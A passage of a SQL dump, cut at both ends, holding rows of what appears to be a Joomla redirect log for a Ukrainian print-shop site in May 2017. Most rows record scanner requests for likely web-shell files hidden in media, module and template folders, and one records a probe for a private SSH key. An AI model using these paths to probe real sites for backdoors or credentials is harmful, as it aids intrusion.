00:00:00',301),(9327,'http://ekvatorprint.com.ua/images/tpl.php',NULL,'http://ekvatorprint.com.ua/images/tpl.php','',1,0,'2017-05-01 20:02:31','0000-00-00 00:00:00',301),(9328,'http://ekvatorprint.com.ua/images/secure.php',NULL,'http://ekvatorprint.com.ua/images/secure.php','',2,0,'2017-05-01 20:02:31','0000-00-00 00:00:00',301),(9329,'http://ekvatorprint.com.ua/images/wp-plug.php',NULL,'http://ekvatorprint.com.ua/images/wp-plug.php','',1,0,'2017-05-01 20:02:31','0000-00-00 00:00:00',301),(9330,'http://ekvatorprint.com.ua/images/stcchatsc.php',NULL,'http://ekvatorprint.com.ua/images/stcchatsc.php','',1,0,'2017-05-01 20:02:31','0000-00-00 00:00:00',301),(9331,'http://ekvatorprint.com.ua/images/tppp.php',NULL,'http://ekvatorprint.com.ua/images/tppp.php','',1,0,'2017-05-01 20:02:31','0000-00-00 00:00:00',301),(9332,'http://ekvatorprint.com.ua/images/resm.php',NULL,'http://ekvatorprint.com.ua/images/resm.php','',1,0,'2017-05-01 20:02:32','0000-00-00 00:00:00',301),(9333,'http://ekvatorprint.com.ua/images/stories/im6713n5g.php',NULL,'http://ekvatorprint.com.ua/images/stories/im6713n5g.php','',1,0,'2017-05-01 20:02:32','0000-00-00 00:00:00',301),(9334,'http://ekvatorprint.com.ua/language/secure.php',NULL,'http://ekvatorprint.com.ua/language/secure.php','',1,0,'2017-05-01 20:02:52','0000-00-00 00:00:00',301),(9335,'http://ekvatorprint.com.ua/language/overrides/ms-default-base.php',NULL,'http://ekvatorprint.com.ua/language/overrides/ms-default-base.php','',3,0,'2017-05-01 20:02:53','0000-00-00 00:00:00',301),(9336,'http://ekvatorprint.com.ua/language/en-gb/dispacher.php',NULL,'http://ekvatorprint.com.ua/language/en-gb/dispacher.php','',1,0,'2017-05-01 20:02:53','0000-00-00 00:00:00',301),(9337,'http://ekvatorprint.com.ua/includes/mod.php',NULL,'http://ekvatorprint.com.ua/includes/mod.php','',1,0,'2017-05-01 20:02:53','0000-00-00 00:00:00',301),(9338,'http://ekvatorprint.com.ua/language/overrides/dispacher.php',NULL,'http://ekvatorprint.com.ua/language/overrides/dispacher.php','',1,0,'2017-05-01 20:02:54','0000-00-00 00:00:00',301),(9339,'http://ekvatorprint.com.ua/language/ru-ru/dispacher.php',NULL,'http://ekvatorprint.com.ua/language/ru-ru/dispacher.php','',1,0,'2017-05-01 20:02:54','0000-00-00 00:00:00',301),(9340,'http://ekvatorprint.com.ua/logs/secure.php',NULL,'http://ekvatorprint.com.ua/logs/secure.php','',1,0,'2017-05-01 20:03:16','0000-00-00 00:00:00',301),(9341,'http://ekvatorprint.com.ua/libraries/simplepie/idn/test.php',NULL,'http://ekvatorprint.com.ua/libraries/simplepie/idn/test.php','',1,0,'2017-05-01 20:03:17','0000-00-00 00:00:00',301),(9342,'http://ekvatorprint.com.ua/libraries/phputf8/core.php',NULL,'http://ekvatorprint.com.ua/libraries/phputf8/core.php','',1,0,'2017-05-01 20:03:18','0000-00-00 00:00:00',301),(9343,'http://ekvatorprint.com.ua/libraries/phpmailer/wpconfig-new.php',NULL,'http://ekvatorprint.com.ua/libraries/phpmailer/wpconfig-new.php','',1,0,'2017-05-01 20:03:18','0000-00-00 00:00:00',301),(9344,'http://ekvatorprint.com.ua/libraries/joomla/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/wp-xmlrpc.php','',1,0,'2017-05-01 20:03:19','0000-00-00 00:00:00',301),(9345,'http://ekvatorprint.com.ua/libraries/phpmailer/license.php',NULL,'http://ekvatorprint.com.ua/libraries/phpmailer/license.php','',1,0,'2017-05-01 20:03:19','0000-00-00 00:00:00',301),(9346,'http://ekvatorprint.com.ua/media/com_akeeba/icons/wp-error.php',NULL,'http://ekvatorprint.com.ua/media/com_akeeba/icons/wp-error.php','',1,0,'2017-05-01 20:03:20','0000-00-00 00:00:00',301),(9347,'http://ekvatorprint.com.ua/media/com_finder/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/com_finder/dispacher.php','',1,0,'2017-05-01 20:03:38','0000-00-00 00:00:00',301),(9348,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/thumbs.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/thumbs.php','',1,0,'2017-05-01 20:03:39','0000-00-00 00:00:00',301),(9349,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/page.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/page.php','',1,0,'2017-05-01 20:03:39','0000-00-00 00:00:00',301),(9350,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_captcha.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_captcha.php','',1,0,'2017-05-01 20:03:39','0000-00-00 00:00:00',301),(9351,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/thumbs.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/thumbs.php','',1,0,'2017-05-01 20:03:39','0000-00-00 00:00:00',301),(9352,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.php','',1,0,'2017-05-01 20:03:40','0000-00-00 00:00:00',301),(9353,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/main.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/main.php','',1,0,'2017-05-01 20:04:00','0000-00-00 00:00:00',301),(9354,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_captcha.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_captcha.php','',1,0,'2017-05-01 20:04:00','0000-00-00 00:00:00',301),(9355,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/insertdatetime/shtml.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/insertdatetime/shtml.php','',1,0,'2017-05-01 20:04:01','0000-00-00 00:00:00',301),(9356,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/ppl.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/ppl.php','',1,0,'2017-05-01 20:04:02','0000-00-00 00:00:00',301),(9357,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/page.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/page.php','',1,0,'2017-05-01 20:04:27','0000-00-00 00:00:00',301),(9358,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/style.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/style.php','',1,0,'2017-05-01 20:04:27','0000-00-00 00:00:00',301),(9359,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/logsa.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/logsa.php','',1,0,'2017-05-01 20:04:28','0000-00-00 00:00:00',301),(9360,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_captcha.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_captcha.php','',1,0,'2017-05-01 20:04:49','0000-00-00 00:00:00',301),(9361,'http://ekvatorprint.com.ua/media/mod_languages/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/mod_languages/dispacher.php','',1,0,'2017-05-01 20:05:11','0000-00-00 00:00:00',301),(9362,'http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/dispacher.php','',1,0,'2017-05-01 20:05:11','0000-00-00 00:00:00',301),(9363,'http://ekvatorprint.com.ua/media/plg_system_highlight/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/plg_system_highlight/dispacher.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9364,'http://ekvatorprint.com.ua/media/plg_quickicon_extensionupdate/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/plg_quickicon_extensionupdate/dispacher.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9365,'http://ekvatorprint.com.ua/media/secure.php',NULL,'http://ekvatorprint.com.ua/media/secure.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9366,'http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/wpconfig-new.php',NULL,'http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/wpconfig-new.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9367,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/ppl.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/ppl.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9368,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/j_engines.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/j_engines.php','',1,0,'2017-05-01 20:05:12','0000-00-00 00:00:00',301),(9369,'http://ekvatorprint.com.ua/media/mailto/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/mailto/dispacher.php','',1,0,'2017-05-01 20:05:13','0000-00-00 00:00:00',301),(9370,'http://ekvatorprint.com.ua/media/system/dispacher.php',NULL,'http://ekvatorprint.com.ua/media/system/dispacher.php','',1,0,'2017-05-01 20:05:13','0000-00-00 00:00:00',301),(9371,'http://ekvatorprint.com.ua/media/mailto/wpconfig-new.php',NULL,'http://ekvatorprint.com.ua/media/mailto/wpconfig-new.php','',1,0,'2017-05-01 20:05:13','0000-00-00 00:00:00',301),(9372,'http://ekvatorprint.com.ua/modules/mod_araticlhess/bn.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/bn.php','',1,0,'2017-05-01 20:05:33','0000-00-00 00:00:00',301),(9373,'http://ekvatorprint.com.ua/modules/j_langs.php',NULL,'http://ekvatorprint.com.ua/modules/j_langs.php','',1,0,'2017-05-01 20:05:34','0000-00-00 00:00:00',301),(9374,'http://ekvatorprint.com.ua/modules/ef.php',NULL,'http://ekvatorprint.com.ua/modules/ef.php','',1,0,'2017-05-01 20:05:35','0000-00-00 00:00:00',301),(9375,'http://ekvatorprint.com.ua/media/system/images/secure.php',NULL,'http://ekvatorprint.com.ua/media/system/images/secure.php','',1,0,'2017-05-01 20:05:35','0000-00-00 00:00:00',301),(9376,'http://ekvatorprint.com.ua/media/system/js/secure.php',NULL,'http://ekvatorprint.com.ua/media/system/js/secure.php','',1,0,'2017-05-01 20:05:35','0000-00-00 00:00:00',301),(9377,'http://ekvatorprint.com.ua/modules/mod_araticlhess/ef.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/ef.php','',1,0,'2017-05-01 20:05:36','0000-00-00 00:00:00',301),(9378,'http://ekvatorprint.com.ua/media/system/js/wp-error.php',NULL,'http://ekvatorprint.com.ua/media/system/js/wp-error.php','',1,0,'2017-05-01 20:05:36','0000-00-00 00:00:00',301),(9379,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/func.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/func.php','',1,0,'2017-05-01 20:05:56','0000-00-00 00:00:00',301),(9380,'http://ekvatorprint.com.ua/modules/mod_articles1/func.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles1/func.php','',1,0,'2017-05-01 20:05:56','0000-00-00 00:00:00',301),(9381,'http://ekvatorprint.com.ua/modules/mod_araticlhess/ir.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/ir.php','',1,0,'2017-05-01 20:05:56','0000-00-00 00:00:00',301),(9382,'http://ekvatorprint.com.ua/modules/mod_caches/mod_caches.php',NULL,'http://ekvatorprint.com.ua/modules/mod_caches/mod_caches.php','',1,0,'2017-05-01 20:06:19','0000-00-00 00:00:00',301),(9383,'http://ekvatorprint.com.ua/modules/mod_breadcrumbs/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_breadcrumbs/wp-xmlrpc.php','',1,0,'2017-05-01 20:06:19','0000-00-00 00:00:00',301),(9384,'http://ekvatorprint.com.ua/modules/mod_footer/groups.php',NULL,'http://ekvatorprint.com.ua/modules/mod_footer/groups.php','',1,0,'2017-05-01 20:06:45','0000-00-00 00:00:00',301),(9385,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/configg.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/configg.php','',1,0,'2017-05-01 20:06:45','0000-00-00 00:00:00',301),(9386,'http://ekvatorprint.com.ua/modules/mod_finder/dispacher.php',NULL,'http://ekvatorprint.com.ua/modules/mod_finder/dispacher.php','',1,0,'2017-05-01 20:06:45','0000-00-00 00:00:00',301),(9387,'http://ekvatorprint.com.ua/modules/mod_stats/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_stats/wp-xmlrpc.php','',1,0,'2017-05-01 20:07:31','0000-00-00 00:00:00',301),(9388,'http://ekvatorprint.com.ua/modules/mod_whosonline/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_whosonline/wp-xmlrpc.php','',1,0,'2017-05-01 20:07:59','0000-00-00 00:00:00',301),(9389,'http://ekvatorprint.com.ua/modules/mod_webantivirus/mod_webantivirus.php',NULL,'http://ekvatorprint.com.ua/modules/mod_webantivirus/mod_webantivirus.php','',1,0,'2017-05-01 20:08:00','0000-00-00 00:00:00',301),(9390,'http://ekvatorprint.com.ua/modules/mod_users_latest/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_users_latest/wp-xmlrpc.php','',1,0,'2017-05-01 20:08:01','0000-00-00 00:00:00',301),(9391,'http://ekvatorprint.com.ua/new/tmp/simple.php',NULL,'http://ekvatorprint.com.ua/new/tmp/simple.php','',1,0,'2017-05-01 20:08:01','0000-00-00 00:00:00',301),(9392,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9393,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_joomlasec.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9394,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_joomlasec.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9395,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/images/xp/en.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/images/xp/en.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9396,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/websystem.php',NULL,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/websystem.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9397,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/sys.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/sys.php','',1,0,'2017-05-01 20:08:18','0000-00-00 00:00:00',301),(9398,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/core.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/core.php','',1,0,'2017-05-01 20:08:19','0000-00-00 00:00:00',301),(9399,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php','',1,0,'2017-05-01 20:08:41','0000-00-00 00:00:00',301),(9400,'http://ekvatorprint.com.ua/plugins/system/captcha.php',NULL,'http://ekvatorprint.com.ua/plugins/system/captcha.php','',1,0,'2017-05-01 20:08:42','0000-00-00 00:00:00',301),(9401,'http://ekvatorprint.com.ua/plugins/search/weblinks/wp-error.php',NULL,'http://ekvatorprint.com.ua/plugins/search/weblinks/wp-error.php','',1,0,'2017-05-01 20:08:43','0000-00-00 00:00:00',301),(9402,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/core.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/core.php','',1,0,'2017-05-01 20:08:43','0000-00-00 00:00:00',301),(9403,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/sys.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/sys.php','',1,0,'2017-05-01 20:08:44','0000-00-00 00:00:00',301),(9404,'http://ekvatorprint.com.ua/plugins/search/sustemesuse.php',NULL,'http://ekvatorprint.com.ua/plugins/search/sustemesuse.php','',1,0,'2017-05-01 20:08:44','0000-00-00 00:00:00',301),(9405,'http://ekvatorprint.com.ua/plugins/system/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/plugins/system/wp-xmlrpc.php','',1,0,'2017-05-01 20:09:04','0000-00-00 00:00:00',301),(9406,'http://ekvatorprint.com.ua/plugins/system/contentprotection.php',NULL,'http://ekvatorprint.com.ua/plugins/system/contentprotection.php','',1,0,'2017-05-01 20:09:04','0000-00-00 00:00:00',301),(9407,'http://ekvatorprint.com.ua/templates/atomic/modules.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/modules.php','',1,0,'2017-05-01 20:09:04','0000-00-00 00:00:00',301),(9408,'http://ekvatorprint.com.ua/plugins/user/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/plugins/user/wp-xmlrpc.php','',1,0,'2017-05-01 20:09:05','0000-00-00 00:00:00',301),(9409,'http://ekvatorprint.com.ua/templates/secure.php',NULL,'http://ekvatorprint.com.ua/templates/secure.php','',1,0,'2017-05-01 20:09:26','0000-00-00 00:00:00',301),(9410,'http://ekvatorprint.com.ua/templates/system/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/templates/system/wp-xmlrpc.php','',1,0,'2017-05-01 20:09:26','0000-00-00 00:00:00',301),(9411,'http://ekvatorprint.com.ua/templates/system/online.php',NULL,'http://ekvatorprint.com.ua/templates/system/online.php','',1,0,'2017-05-01 20:09:26','0000-00-00 00:00:00',301),(9412,'http://ekvatorprint.com.ua/tmp/jm.php',NULL,'http://ekvatorprint.com.ua/tmp/jm.php','',1,0,'2017-05-01 20:09:48','0000-00-00 00:00:00',301),(9413,'http://ekvatorprint.com.ua/tmp/aratidhess.php',NULL,'http://ekvatorprint.com.ua/tmp/aratidhess.php','',1,0,'2017-05-01 20:09:49','0000-00-00 00:00:00',301),(9414,'http://ekvatorprint.com.ua/tmp/license.php',NULL,'http://ekvatorprint.com.ua/tmp/license.php','',2,0,'2017-05-01 20:09:49','0000-00-00 00:00:00',301),(9415,'http://ekvatorprint.com.ua/tmp/j.php',NULL,'http://ekvatorprint.com.ua/tmp/j.php','',1,0,'2017-05-01 20:09:50','0000-00-00 00:00:00',301),(9416,'http://ekvatorprint.com.ua/tmp/mod_config.php',NULL,'http://ekvatorprint.com.ua/tmp/mod_config.php','',4,0,'2017-05-01 20:09:50','0000-00-00 00:00:00',301),(9417,'http://ekvatorprint.com.ua/index.php?option=com_tag&task=tag&tag=1',NULL,'http://www.google.com/','',2,0,'2017-05-02 23:35:56','0000-00-00 00:00:00',301),(9418,'http://ekvatorprint.com.ua/blog/wp-includes/wlwmanifest.xml',NULL,'','',105,0,'2017-05-03 10:02:30','0000-00-00 00:00:00',301),(9419,'http://ekvatorprint.com.ua/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',89,0,'2017-05-03 10:02:31','0000-00-00 00:00:00',301),(9420,'http://ekvatorprint.com.ua/wp/wp-includes/wlwmanifest.xml',NULL,'','',89,0,'2017-05-03 10:02:31','0000-00-00 00:00:00',301),(9421,'http://ekvatorprint.com.ua/site/wp-includes/wlwmanifest.xml',NULL,'','',89,0,'2017-05-03 10:02:31','0000-00-00 00:00:00',301),(9422,'http://ekvatorprint.com.ua/banner-printing\"',NULL,'','',1,0,'2017-05-04 13:34:22','0000-00-00 00:00:00',301),(9423,'http://ekvatorprint.com.ua/\"',NULL,'','',2,0,'2017-05-04 13:34:24','0000-00-00 00:00:00',301),(9424,'http://ekvatorprint.com.ua/contacts\"',NULL,'','',1,0,'2017-05-04 13:39:55','0000-00-00 00:00:00',301),(9425,'http://ekvatorprint.com.ua/.ssh/id_dsa',NULL,'','',9,0,'2017-05-05 02:54:29','0000-00-00 00:00:00',301),(9426,'http://ekvatorprint.com.ua/nhuig.php',NULL,'','',2,0,'2017-05-08 08:16:10','0000-00-00 00:00:00',301),(9427,'http://ekvatorprint.com.ua/components/com_contact/models/setup.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/models/setup.php','',1,0,'2017-05-09 19:36:01','0000-00-00 00:00:00',301),(9428,'http://ekvatorprint.com.ua/administrator/components/com_eventgallery/views/imagetypes/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_eventgallery/views/imagetypes/config.php','',2,0,'2017-05-10 23:59:20','0000-00-00 00:00:00',301),(9429,'http://ekvatorprint.com.ua/administrator/language/ru-ru/wp-cdo-pilates.sk/media/media/images/mime-icon-16/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/language/ru-ru/wp-cdo-pilates.sk/media/media/images/mime-icon-16/backup.php','',1,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9430,'http://ekvatorprint.com.ua/administrator/components/com_config/controller/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_config/controller/backup.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9431,'http://ekvatorprint.com.ua/administrator/templates/isis/html/mod_version/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/isis/html/mod_version/config.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9432,'http://ekvatorprint.com.ua/administrator/templates/isis/img/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/isis/img/backup.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9433,'http://ekvatorprint.com.ua/administrator/modules/mod_feed/accesfull.php',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_feed/accesfull.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9434,'http://ekvatorprint.com.ua/administrator/templates/isis/images/admin/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/isis/images/admin/config.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9435,'http://ekvatorprint.com.ua/administrator/components/com_contact/helpers/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_contact/helpers/backup.php','',3,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9436,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/backup.php','',2,0,'2017-05-10 23:59:21','0000-00-00 00:00:00',301),(9437,'http://ekvatorprint.com.ua/dd-formmailer/j_ajax.php',NULL,'http://ekvatorprint.com.ua/dd-formmailer/j_ajax.php','',3,0,'2017-05-10 23:59:56','0000-00-00 00:00:00',301),(9438,'http://ekvatorprint.com.ua/components/com_jce/editor/elements/dmsxe.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/elements/dmsxe.php','',3,0,'2017-05-10 23:59:56','0000-00-00 00:00:00',301),(9439,'http://ekvatorprint.com.ua/ess.php',NULL,'http://ekvatorprint.com.ua/ess.php','',2,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9440,'http://ekvatorprint.com.ua/components/com_media/sz39bi.php',NULL,'http://ekvatorprint.com.ua/components/com_media/sz39bi.php','',2,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9441,'http://ekvatorprint.com.ua/components/com_jce/query.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/query.php','',2,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9442,'http://ekvatorprint.com.ua/components/com_adsmanager/views/details/tmpl/update.php',NULL,'http://ekvatorprint.com.ua/components/com_adsmanager/views/details/tmpl/update.php','',2,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9443,'http://ekvatorprint.com.ua/components/com_eventgallery/library/factory/file/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_eventgallery/library/factory/file/backup.php','',3,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9444,'http://ekvatorprint.com.ua/components/com_content/models/forms/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/forms/backup.php','',2,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9445,'http://ekvatorprint.com.ua/components/com_adsmanager/views/details/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_adsmanager/views/details/tmpl/backup.php','',3,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9446,'http://ekvatorprint.com.ua/components/com_content/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_content/backup.php','',3,0,'2017-05-10 23:59:57','0000-00-00 00:00:00',301),(9447,'http://ekvatorprint.com.ua/components/com_wrapper/wrapper.i.php',NULL,'http://ekvatorprint.com.ua/components/com_wrapper/wrapper.i.php','',2,0,'2017-05-10 23:59:58','0000-00-00 00:00:00',301),(9448,'http://ekvatorprint.com.ua/components/com_users/views/remind/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/remind/tmpl/backup.php','',2,0,'2017-05-10 23:59:58','0000-00-00 00:00:00',301),(9449,'http://ekvatorprint.com.ua/libraries/joomla/document/system.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/document/system.php','',2,0,'2017-05-11 00:00:35','0000-00-00 00:00:00',301),(9450,'http://ekvatorprint.com.ua/libraries/joomla/filesystem/streams/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/filesystem/streams/backup.php','',3,0,'2017-05-11 00:00:35','0000-00-00 00:00:00',301),(9451,'http://ekvatorprint.com.ua/libraries/joomla/cache/gs.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/gs.php','',4,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9452,'http://ekvatorprint.com.ua/includes/wp-sysmanager.php',NULL,'http://ekvatorprint.com.ua/includes/wp-sysmanager.php','',3,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9453,'http://ekvatorprint.com.ua/libraries/joomla/document/feed/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/document/feed/backup.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9454,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_p8zz9x.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/.lib_p8zz9x.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9455,'http://ekvatorprint.com.ua/libraries/cms/less/formatter/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/less/formatter/backup.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9456,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/backup.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/backup.php','',2,0,'2017-05-11 00:00:36','0000-00-00 00:00:00',301),(9457,'http://ekvatorprint.com.ua/libraries/joomla/github/package/data/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/github/package/data/backup.php','',3,0,'2017-05-11 00:00:36','0000-00-00 